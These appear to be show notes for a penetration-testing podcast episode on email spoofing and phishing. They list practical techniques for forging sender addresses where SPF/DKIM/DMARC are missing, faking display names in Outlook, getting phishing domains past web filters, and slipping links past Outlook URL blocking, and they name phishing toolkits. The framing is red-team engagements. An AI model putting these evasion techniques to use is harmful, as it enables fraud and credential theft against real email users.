This month’s podcast is hosted by Andrew, Luke, Zack, and Lane – We cover news items and then jump into our tech segment on phishing and email spoofing.
Follow us on Twitter
Hear us Talk at RVASec
Meet us at NapSec (Monthly – next is on May 17th)
Technical Segment: Email Spoofing and Phishing
Highlight: If a company is using Google Apps for Work and has not set up SPF/DKIM/DMARC their domain can be leveraged to spoof emails..very reliably. Just follow the techniques discussed in the Cobalt Strike blog post and you’ll only have an issue if they setup the DNS TXT records for SPF/DKIM/DMARC.
- Surprise surprise, people click links! Do you even need to be crafty? No probably not, but lets discuss some ways anyhow.
- You can spoof Emails – It can happen: Great write-up from Cobalt Strike
- If you are new to the email spoofing you should really read this article
- Telnet to the mail server, and attempt to manually craft the email. This works in default configurations on many Email servers and security appliances – SPF/DKIM/DMARC may not be setup allowing you to send email from the domain unauthenticated – The Cobalt Strike blog demonstrates that.
- This can also be done in Gmail! – Shows up as spoofed in normal gmail, but what about Google Apps for Work – You do not have SPF/DKIM/DMARC setup and can very easily spoof emails from that domain – both two the target domain and externally, and it will very frequently bypass security controls – we will release code on how to do that.
- We are normally targeting organizations that leverage Outlook – It will only grab the name portion of the email header (not the email) and present that to users, so you can have a Gmail email (can bypass controls since its Gmail/legit) and you can send email using Python (or another scripting language), and modify the name to be a quazi-spoof.
- Submit your phishing domain to web content filters like BlueCoat.
- If you can have live content on your phishing domain before engagement can also help it get categorized in your favour.
- HTML paragraph tags can bypass URL “BLOCKED” filtering in Outlook.
- Consider the use of URL shortners.
- Test, test, test with your target POC before deploying to the organization (if possible).
- Tools to help with Phishing: Social Engineering Toolkit (SET), SpeedPhish Framework (SPF), GoPhish, Lucy
- [Code] Example Script to send Email in Python